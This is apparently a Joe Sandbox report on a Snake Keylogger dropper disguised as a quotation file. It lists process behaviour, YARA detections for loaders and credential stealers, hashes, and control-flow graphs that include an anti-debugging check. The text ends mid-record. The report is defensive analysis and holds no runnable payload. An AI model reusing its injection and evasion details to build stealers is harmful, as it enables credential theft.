                                                              2024-11-20 07:19:10 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:02:18:08
                                                              Start date:20/11/2024
                                                              Path:C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe"
                                                              Imagebase:0x228e4e30000
                                                              File size:339'456 bytes
                                                              MD5 hash:5287698C5838C217C8330670920D1F22
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2214752450.0000022880090000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2215561209.00000228E70FA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2215561209.00000228E6D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:02:18:57
                                                              Start date:20/11/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
                                                              Imagebase:0x1904ee40000
                                                              File size:55'824 bytes
                                                              MD5 hash:DF5419B32657D2896514B6A1D041FE08
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2961287104.0000019050ECE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2961287104.0000019050C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate
                                                              Has exited:false

                                                              General

                                                              Target ID:5
                                                              Start time:02:18:57
                                                              Start date:20/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:6.6%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:100%
                                                                Total number of Nodes:3
                                                                Total number of Limit Nodes:0
                                                                execution_graph 38850 7ffd9bab1535 38851 7ffd9bab154f CheckRemoteDebuggerPresent 38850->38851 38853 7ffd9bab15f3 38851->38853

                                                                Executed Functions

                                                                Function 00007FFD9BA90060 Relevance: 1.9, Instructions: 1923COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2228773050.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9ba90000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d045936d39f8edcae86dd0580f3858faa69dc3afabd965f13d1f83f6f7516908
                                                                • Instruction ID: d45fd80355ffa5fc34bba7a88eeff750e5d14ac4594b3fc041ca2f00a786072f
                                                                • Opcode Fuzzy Hash: d045936d39f8edcae86dd0580f3858faa69dc3afabd965f13d1f83f6f7516908
                                                                • Instruction Fuzzy Hash: 8DE2B230A09A4D8FDBA9DF68C490BA97BF1FF59740F1541AAD44DC72A6CA34ED81CB40
                                                                Function 00007FFD9BAB1535 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 981 7ffd9bab1535-7ffd9bab15f1 CheckRemoteDebuggerPresent 986 7ffd9bab15f9-7ffd9bab163d 981->986 987 7ffd9bab15f3 981->987 987->986
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2228773050.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9ba90000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID: CheckDebuggerPresentRemote
                                                                • String ID:
                                                                • API String ID: 3662101638-0
                                                                • Opcode ID: 3adcd4792af3f1b6991096aab95db102bad4a30b250b50c4db58aed7d00b5e41
                                                                • Instruction ID: f8ed22a18b93e87700de07a9c437509e47b144ce644c6cf3cb626a13e0561590
                                                                • Opcode Fuzzy Hash: 3adcd4792af3f1b6991096aab95db102bad4a30b250b50c4db58aed7d00b5e41
                                                                • Instruction Fuzzy Hash: 2231F43190CB588FDB289F9898596FD7BE1EF95311F04426FE09AD3292DB34A4468781
                                                                Function 00007FFD9BAA4F9D Relevance: 1.2, Instructions: 1238COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2228773050.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9ba90000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 715293b6b2cc462302958193ad8708d47c7c073def624cd21f695bbb9adf3496
                                                                • Instruction ID: fc359762ff9380d215bed0e23746bc48a8bc798cdd850da378338630995b1dfa
                                                                • Opcode Fuzzy Hash: 715293b6b2cc462302958193ad8708d47c7c073def624cd21f695bbb9adf3496
                                                                • Instruction Fuzzy Hash: 61822630B09A4E4FE7799BA888742B977D2FF94310F15067ED04EC72E2DE68E9428754
                                                                Function 00007FFD9BA97C29 Relevance: .9, Instructions: 914COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2161 7ffd9ba97c29-7ffd9ba97c84 2164 7ffd9ba97ce5-7ffd9ba97ce9 2161->2164 2165 7ffd9ba97c86-7ffd9ba97ce0 call 7ffd9ba97368 2161->2165 2167 7ffd9ba97cfa 2164->2167 2168 7ffd9ba97ceb-7ffd9ba97cf8 call 7ffd9ba95010 2164->2168 2210 7ffd9ba982d4-7ffd9ba982e7 2165->2210 2169 7ffd9ba97cfc-7ffd9ba97d05 2167->2169 2168->2169 2171 7ffd9ba97e3a-7ffd9ba97e3f 2169->2171 2172 7ffd9ba97d0b-7ffd9ba97d10 2169->2172 2178 7ffd9ba97ea5-7ffd9ba97ea9 2171->2178 2179 7ffd9ba97e41-7ffd9ba97e53 call 7ffd9ba92660 2171->2179 2175 7ffd9ba97d16-7ffd9ba97d1b 2172->2175 2176 7ffd9ba982e8-7ffd9ba9831a 2172->2176 2180 7ffd9ba97d1d-7ffd9ba97d29 2175->2180 2181 7ffd9ba97d2f-7ffd9ba97d45 call 7ffd9ba94c60 2175->2181 2187 7ffd9ba98321-7ffd9ba98353 2176->2187 2182 7ffd9ba97eab-7ffd9ba97eb3 call 7ffd9ba91a00 2178->2182 2183 7ffd9ba97ef1-7ffd9ba97f1c 2178->2183 2195 7ffd9ba97e58-7ffd9ba97e5f 2179->2195 2180->2181 2180->2187 2193 7ffd9ba97d4a-7ffd9ba97e35 call 7ffd9ba95990 call 7ffd9ba97180 2181->2193 2194 7ffd9ba97eb8-7ffd9ba97ebe 2182->2194 2213 7ffd9ba97f2b 2183->2213 2214 7ffd9ba97f1e-7ffd9ba97f29 2183->2214 2199 7ffd9ba9835a-7ffd9ba98363 2187->2199 2193->2210 2194->2199 2200 7ffd9ba97ec4-7ffd9ba97ee1 2194->2200 2203 7ffd9ba97e55-7ffd9ba97e56 2195->2203 2204 7ffd9ba97e61-7ffd9ba97e82 call 7ffd9ba97ac0 2195->2204 2215 7ffd9ba9837d-7ffd9ba983cc 2199->2215 2217 7ffd9ba97ee3-7ffd9ba97eec call 7ffd9ba97230 2200->2217 2203->2195 2219 7ffd9ba97e87-7ffd9ba97ea0 call 7ffd9ba97300 2204->2219 2220 7ffd9ba97f2d-7ffd9ba97f3b 2213->2220 2214->2220 2245 7ffd9ba983d3-7ffd9ba98410 2215->2245 2217->2210 2219->2210 2220->2217 2228 7ffd9ba97f3d-7ffd9ba97f5c 2220->2228 2234 7ffd9ba98159-7ffd9ba9815a 2228->2234 2235 7ffd9ba97f62-7ffd9ba97f81 call 7ffd9ba91760 2228->2235 2240 7ffd9ba98161 2234->2240 2243 7ffd9ba97f87-7ffd9ba97f9e call 7ffd9ba91790 2235->2243 2244 7ffd9ba98151-7ffd9ba98154 2235->2244 2241 7ffd9ba98166 2240->2241 2246 7ffd9ba9816a-7ffd9ba9816c 2241->2246 2264 7ffd9ba97fb7-7ffd9ba97fc1 2243->2264 2265 7ffd9ba97fa0-7ffd9ba97fb6 2243->2265 2248 7ffd9ba98056-7ffd9ba98058 2244->2248 2268 7ffd9ba9841b-7ffd9ba98426 2245->2268 2269 7ffd9ba98412-7ffd9ba98419 2245->2269 2251 7ffd9ba9816e-7ffd9ba98171 2246->2251 2252 7ffd9ba98173-7ffd9ba98178 2246->2252 2249 7ffd9ba9805e-7ffd9ba9807d call 7ffd9ba91760 2248->2249 2250 7ffd9ba9810d-7ffd9ba98116 2248->2250 2249->2250 2285 7ffd9ba98083-7ffd9ba9809a call 7ffd9ba91790 2249->2285 2262 7ffd9ba9820c-7ffd9ba98211 2250->2262 2263 7ffd9ba9811c-7ffd9ba98121 2250->2263 2258 7ffd9ba981ab-7ffd9ba981ae 2251->2258 2260 7ffd9ba9817a-7ffd9ba9818b 2252->2260 2261 7ffd9ba981a3-7ffd9ba981a8 2252->2261 2277 7ffd9ba981b0-7ffd9ba981b3 2258->2277 2278 7ffd9ba981ff-7ffd9ba98206 2258->2278 2287 7ffd9ba981d6-7ffd9ba981da 2260->2287 2288 7ffd9ba9818d-7ffd9ba9819c 2260->2288 2261->2258 2275 7ffd9ba9825f-7ffd9ba98285 2262->2275 2276 7ffd9ba98213-7ffd9ba98237 2262->2276 2273 7ffd9ba98168 2263->2273 2274 7ffd9ba98123-7ffd9ba9812c 2263->2274 2266 7ffd9ba97ff2-7ffd9ba97ff9 2264->2266 2267 7ffd9ba97fc3-7ffd9ba97fec 2264->2267 2265->2264 2266->2245 2280 7ffd9ba97fff-7ffd9ba98016 2266->2280 2267->2215 2267->2266 2269->2268 2284 7ffd9ba98427-7ffd9ba98478 2269->2284 2273->2246 2274->2240 2281 7ffd9ba9812e-7ffd9ba98133 2274->2281 2292 7ffd9ba98287-7ffd9ba982aa 2275->2292 2293 7ffd9ba982ab-7ffd9ba982cb call 7ffd9ba97180 2275->2293 2299 7ffd9ba98257-7ffd9ba98258 2276->2299 2300 7ffd9ba98239-7ffd9ba98250 2276->2300 2289 7ffd9ba981b5-7ffd9ba981d5 2277->2289 2290 7ffd9ba981dd-7ffd9ba981fb 2277->2290 2278->2262 2278->2263 2296 7ffd9ba98037-7ffd9ba98050 call 7ffd9ba91760 2280->2296 2297 7ffd9ba98018-7ffd9ba98019 2280->2297 2281->2240 2298 7ffd9ba98135-7ffd9ba9813a 2281->2298 2310 7ffd9ba9809c-7ffd9ba980b1 2285->2310 2311 7ffd9ba980b3-7ffd9ba980ba 2285->2311 2287->2290 2288->2261 2289->2287 2290->2278 2292->2293 2308 7ffd9ba982d0-7ffd9ba982d1 2293->2308 2296->2248 2323 7ffd9ba98149-7ffd9ba9814c 2296->2323 2312 7ffd9ba98020-7ffd9ba98035 2297->2312 2298->2240 2304 7ffd9ba9813c-7ffd9ba98147 2298->2304 2299->2275 2300->2299 2304->2241 2308->2210 2310->2311 2311->2245 2317 7ffd9ba980c0-7ffd9ba980d6 2311->2317 2312->2296 2320 7ffd9ba980d8-7ffd9ba980d9 2317->2320 2321 7ffd9ba980ef-7ffd9ba98107 call 7ffd9ba91760 2317->2321 2327 7ffd9ba980e0-7ffd9ba980e8 2320->2327 2321->2250 2321->2285 2323->2243 2327->2321
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2228773050.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9ba90000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3a22f6fb70d7797e20898338c0b5390702f6acffb79527020a532bc075e9d769
                                                                • Instruction ID: 8b1f50183b400b728b8f71ce274d10ca129d2c0f5af787aab620864d55379dfd
                                                                • Opcode Fuzzy Hash: 3a22f6fb70d7797e20898338c0b5390702f6acffb79527020a532bc075e9d769
                                                                • Instruction Fuzzy Hash: 38520F30B19A4E4FEBA8DB688465A75B3E1FF98350F40017ED44EC32A6DF64BC428781
                                                                Function 00007FFD9BA94C41 Relevance: .9, Instructions: 888COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2549 7ffd9ba94c41-7ffd9ba94c89 2551 7ffd9ba94c9a-7ffd9ba94cac 2549->2551 2552 7ffd9ba94c8b-7ffd9ba94c99 2549->2552 2554 7ffd9ba94cae-7ffd9ba94cbe 2551->2554 2555 7ffd9ba94d21-7ffd9ba94d25 2551->2555 2562 7ffd9ba94f86-7ffd9ba94fd5 2554->2562 2563 7ffd9ba94cc4-7ffd9ba94d09 2554->2563 2556 7ffd9ba94d27-7ffd9ba94d2b 2555->2556 2557 7ffd9ba94d3d-7ffd9ba94d41 2555->2557 2561 7ffd9ba94d32-7ffd9ba94d36 2556->2561 2559 7ffd9ba94d70-7ffd9ba94d74 2557->2559 2560 7ffd9ba94d43-7ffd9ba94d6a 2557->2560 2564 7ffd9ba94f77-7ffd9ba94f85 2559->2564 2565 7ffd9ba94d7a-7ffd9ba94d7f 2559->2565 2560->2559 2570 7ffd9ba94fdc-7ffd9ba94ff5 2560->2570 2561->2557 2562->2570 2595 7ffd9ba94d16-7ffd9ba94d1a 2563->2595 2596 7ffd9ba94d0b-7ffd9ba94d14 2563->2596 2565->2564 2568 7ffd9ba94d85-7ffd9ba94d8f 2565->2568 2575 7ffd9ba94dd9-7ffd9ba94dde 2568->2575 2576 7ffd9ba94d91-7ffd9ba94da3 2568->2576 2586 7ffd9ba94ff7-7ffd9ba94ffd 2570->2586 2587 7ffd9ba95001 2570->2587 2578 7ffd9ba94f52-7ffd9ba94f59 2575->2578 2579 7ffd9ba94de4-7ffd9ba94dee 2575->2579 2576->2575 2585 7ffd9ba94da5-7ffd9ba94dcc 2576->2585 2578->2564 2583 7ffd9ba94f5b-7ffd9ba94f6f 2578->2583 2579->2578 2594 7ffd9ba94df4-7ffd9ba94e06 2579->2594 2583->2564 2597 7ffd9ba94f71-7ffd9ba94f74 2583->2597 2585->2575 2600 7ffd9ba94dce-7ffd9ba94dd2 2585->2600 2591 7ffd9ba95005-7ffd9ba9504e 2586->2591 2592 7ffd9ba94fff 2586->2592 2587->2591 2593 7ffd9ba95003 2587->2593 2606 7ffd9ba955e2-7ffd9ba955f4 2591->2606 2607 7ffd9ba95054-7ffd9ba95066 2591->2607 2592->2587 2593->2591 2603 7ffd9ba94ee8-7ffd9ba94f4b 2594->2603 2604 7ffd9ba94e0c-7ffd9ba94e47 2594->2604 2595->2555 2596->2555 2597->2564 2600->2575 2603->2578 2604->2603 2616 7ffd9ba94e4d-7ffd9ba94ea1 2604->2616 2607->2606 2613 7ffd9ba9506c-7ffd9ba9508b 2607->2613 2618 7ffd9ba9508c-7ffd9ba950a5 2613->2618 2616->2603 2630 7ffd9ba94ea3-7ffd9ba94ee6 2616->2630 2618->2606 2625 7ffd9ba950ab-7ffd9ba950b6 2618->2625 2625->2618 2628 7ffd9ba950b8-7ffd9ba950f1 2625->2628 2635 7ffd9ba950f7-7ffd9ba9510f 2628->2635 2636 7ffd9ba951a8-7ffd9ba951bb 2628->2636 2630->2578 2643 7ffd9ba95115-7ffd9ba9513a 2635->2643 2644 7ffd9ba9519c-7ffd9ba951a2 2635->2644 2641 7ffd9ba9521a 2636->2641 2642 7ffd9ba951bd-7ffd9ba951e3 2636->2642 2645 7ffd9ba9521c-7ffd9ba95221 2641->2645 2650 7ffd9ba951e5-7ffd9ba95211 2642->2650 2651 7ffd9ba95213-7ffd9ba95218 2642->2651 2643->2644 2655 7ffd9ba9513c-7ffd9ba9514e 2643->2655 2644->2635 2644->2636 2647 7ffd9ba95268-7ffd9ba9528b 2645->2647 2648 7ffd9ba95223-7ffd9ba9524b 2645->2648 2656 7ffd9ba95378-7ffd9ba95384 2647->2656 2657 7ffd9ba95291-7ffd9ba952be 2647->2657 2648->2647 2661 7ffd9ba9524d-7ffd9ba95266 2648->2661 2650->2645 2651->2645 2655->2644 2664 7ffd9ba95150-7ffd9ba95154 2655->2664 2656->2606 2660 7ffd9ba9538a-7ffd9ba9539f 2656->2660 2669 7ffd9ba9536c-7ffd9ba95372 2657->2669 2670 7ffd9ba952c4-7ffd9ba952df 2657->2670 2660->2606 2661->2647 2666 7ffd9ba955f5-7ffd9ba95606 2664->2666 2667 7ffd9ba9515a-7ffd9ba95178 2664->2667 2667->2644 2676 7ffd9ba9517a-7ffd9ba95198 2667->2676 2669->2656 2669->2657 2670->2669 2677 7ffd9ba952e5-7ffd9ba952f7 2670->2677 2676->2644 2677->2669 2680 7ffd9ba952f9-7ffd9ba952fd 2677->2680 2680->2666 2682 7ffd9ba95303-7ffd9ba9533c 2680->2682 2682->2669 2686 7ffd9ba9533e-7ffd9ba95369 2682->2686 2686->2669
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2228773050.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9ba90000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ab1cb38d0441553868af68c3de3de84a9d8776dfb4891623c9ef31828e7ef992
                                                                • Instruction ID: 29fb1d8ec5db5367c0bd3690ae912b0bff172fe71fae6063a866de75c1d656d8
                                                                • Opcode Fuzzy Hash: ab1cb38d0441553868af68c3de3de84a9d8776dfb4891623c9ef31828e7ef992
                                                                • Instruction Fuzzy Hash: DC429F30719A0D4FEBA8EB2CC869A7977D1FF59300F1640BAE44EC72A6DE64EC418741
                                                                Function 00007FFD9BA919E1 Relevance: .8, Instructions: 839COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2690 7ffd9ba919e1-7ffd9ba91a1e 2692 7ffd9ba91f88-7ffd9ba91fc2 2690->2692 2693 7ffd9ba91a24-7ffd9ba91a36 2690->2693 2703 7ffd9ba91fc3-7ffd9ba91fd1 2692->2703 2697 7ffd9ba91a3c-7ffd9ba91a55 2693->2697 2698 7ffd9ba91f43-7ffd9ba91f55 2693->2698 2697->2698 2702 7ffd9ba91a5b-7ffd9ba91a5f 2697->2702 2704 7ffd9ba91a61-7ffd9ba91a65 2702->2704 2705 7ffd9ba91a83-7ffd9ba91b03 2702->2705 2710 7ffd9ba91fdf 2703->2710 2711 7ffd9ba91fd3-7ffd9ba91fd9 2703->2711 2704->2703 2706 7ffd9ba91a6b-7ffd9ba91a7d 2704->2706 2726 7ffd9ba91b09-7ffd9ba91b26 2705->2726 2727 7ffd9ba91bfc-7ffd9ba91c05 2705->2727 2706->2698 2706->2705 2713 7ffd9ba91fe0-7ffd9ba91fe2 2710->2713 2714 7ffd9ba91fe3-7ffd9ba9206d 2710->2714 2711->2714 2715 7ffd9ba91fdb-7ffd9ba91fde 2711->2715 2713->2714 2722 7ffd9ba9207f 2714->2722 2723 7ffd9ba9206f-7ffd9ba9207d 2714->2723 2715->2710 2725 7ffd9ba92084-7ffd9ba92086 2722->2725 2723->2725 2728 7ffd9ba92088-7ffd9ba92091 2725->2728 2729 7ffd9ba92092-7ffd9ba92093 2725->2729 2732 7ffd9ba91b28-7ffd9ba91b3c 2726->2732 2733 7ffd9ba91b9b-7ffd9ba91bb3 2726->2733 2727->2698 2731 7ffd9ba91c0b-7ffd9ba91c25 2727->2731 2736 7ffd9ba9209b-7ffd9ba9209e 2729->2736 2737 7ffd9ba91c27-7ffd9ba91c3d 2731->2737 2738 7ffd9ba91c44-7ffd9ba91c88 2731->2738 2732->2698 2749 7ffd9ba91b42-7ffd9ba91b44 2732->2749 2740 7ffd9ba91bb5-7ffd9ba91bb7 2733->2740 2741 7ffd9ba91bf0-7ffd9ba91bf6 2733->2741 2742 7ffd9ba920a5-7ffd9ba920cc 2736->2742 2743 7ffd9ba920a0 2736->2743 2737->2738 2760 7ffd9ba91f3d-7ffd9ba91f41 2738->2760 2761 7ffd9ba91c8e-7ffd9ba91ca9 2738->2761 2746 7ffd9ba91bb9-7ffd9ba91bc9 2740->2746 2747 7ffd9ba91bcf-7ffd9ba91bed 2740->2747 2741->2726 2741->2727 2753 7ffd9ba920ce-7ffd9ba920d2 2742->2753 2754 7ffd9ba920d4-7ffd9ba920e0 2742->2754 2748 7ffd9ba9212c-7ffd9ba92133 2743->2748 2746->2698 2746->2747 2747->2741 2751 7ffd9ba91b76-7ffd9ba91b99 2749->2751 2752 7ffd9ba91b46-7ffd9ba91b5c 2749->2752 2751->2741 2752->2751 2763 7ffd9ba91b5e-7ffd9ba91b70 2752->2763 2758 7ffd9ba920e2-7ffd9ba920f6 2753->2758 2754->2758 2771 7ffd9ba920f8-7ffd9ba920fe 2758->2771 2772 7ffd9ba92101-7ffd9ba92106 2758->2772 2760->2698 2765 7ffd9ba91f74-7ffd9ba91f87 2760->2765 2773 7ffd9ba91f2e-7ffd9ba91f37 2761->2773 2774 7ffd9ba91caf-7ffd9ba91cb4 2761->2774 2763->2698 2763->2751 2771->2772 2777 7ffd9ba92108-7ffd9ba9210a 2772->2777 2778 7ffd9ba9210c-7ffd9ba92122 2772->2778 2773->2760 2773->2761 2775 7ffd9ba91cb6-7ffd9ba91cc7 2774->2775 2776 7ffd9ba91cc9-7ffd9ba91cce 2774->2776 2775->2775 2775->2776 2780 7ffd9ba91ed0-7ffd9ba91ed5 2776->2780 2781 7ffd9ba91cd4-7ffd9ba91cdb 2776->2781 2782 7ffd9ba92124-7ffd9ba92127 2777->2782 2778->2782 2787 7ffd9ba91f16-7ffd9ba91f2c 2780->2787 2788 7ffd9ba91ed7-7ffd9ba91ee1 2780->2788 2785 7ffd9ba91ce1-7ffd9ba91ceb 2781->2785 2786 7ffd9ba91de2-7ffd9ba91dea 2781->2786 2783 7ffd9ba92129-7ffd9ba9212a 2782->2783 2784 7ffd9ba92134-7ffd9ba9213d 2782->2784 2783->2748 2793 7ffd9ba91dd6-7ffd9ba91de0 2785->2793 2794 7ffd9ba91cf1-7ffd9ba91d3f 2785->2794 2791 7ffd9ba91f65-7ffd9ba91f6f 2786->2791 2792 7ffd9ba91df0-7ffd9ba91e3e 2786->2792 2787->2773 2788->2773 2790 7ffd9ba91ee3-7ffd9ba91eef 2788->2790 2790->2703 2795 7ffd9ba91ef5-7ffd9ba91f14 2790->2795 2796 7ffd9ba91eb2-7ffd9ba91eca 2791->2796 2809 7ffd9ba91e9c-7ffd9ba91eac 2792->2809 2810 7ffd9ba91e40-7ffd9ba91e77 2792->2810 2797 7ffd9ba91da0-7ffd9ba91db3 2793->2797 2807 7ffd9ba91d41-7ffd9ba91d78 2794->2807 2808 7ffd9ba91d92-7ffd9ba91d9e 2794->2808 2795->2787 2795->2788 2796->2780 2796->2786 2800 7ffd9ba91db5 2797->2800 2801 7ffd9ba91dba-7ffd9ba91dc2 2797->2801 2800->2780 2801->2785 2807->2808 2818 7ffd9ba91d7a-7ffd9ba91d8e 2807->2818 2808->2797 2812 7ffd9ba91dc7-7ffd9ba91dd1 2808->2812 2809->2796 2811 7ffd9ba91f56-7ffd9ba91f60 2809->2811 2810->2809 2817 7ffd9ba91e79-7ffd9ba91e80 2810->2817 2811->2792 2812->2794 2817->2703 2819 7ffd9ba91e86-7ffd9ba91e98 2817->2819 2818->2808 2819->2809
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2228773050.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9ba90000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: acab0b174db937bf27127580caa3ef812889cc1a7b58f8e25705ccf8c4eb4ce0
                                                                • Instruction ID: cc81f7fc0942f357064652caa563b50ab853bf0e462832d1c8a3b28e9c344581
                                                                • Opcode Fuzzy Hash: acab0b174db937bf27127580caa3ef812889cc1a7b58f8e25705ccf8c4eb4ce0
